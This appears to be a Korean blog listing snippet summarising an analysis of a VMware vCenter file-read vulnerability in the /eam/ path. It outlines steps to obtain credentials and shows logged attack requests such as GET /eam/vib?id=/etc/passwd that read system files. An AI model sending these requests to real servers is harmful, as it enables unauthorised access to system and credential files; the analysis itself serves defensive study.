XSS1 VMware vCenter 파일 읽기 취약점 분석 목차 vCenter Server? vCenter Server 는 VMware 용 중앙 집중식 관리 유틸리티이며 단일 중앙 위치에서 가상 머신 , 여러 ESXi 호스트 및 모든 종속 구성 요소 를 관리하는 데 사용됩니다 . VMware vCenter 파일 읽기 취약점 /eam/ 경로 취약점 1. vCenter Server에 /eam/ 경로로 접근 ㄴ 404 응답값 확인 및 버전 정보 확인 2. 해당 경로에서 username 및 password 정보 획득 가능. 3. 아래 경로에서 정상적인 사용자로 로그인 접근 가능 공격 로그 GET /eam/vib?id=/etc/passwd HTTP/1.0 GET /eam/vib?id=/etc/issue HTTP/1.1 GET /eam/vib?id=c:\windows\wi.. 2022. 10. 22. 이전 1 다음 728x90 반응형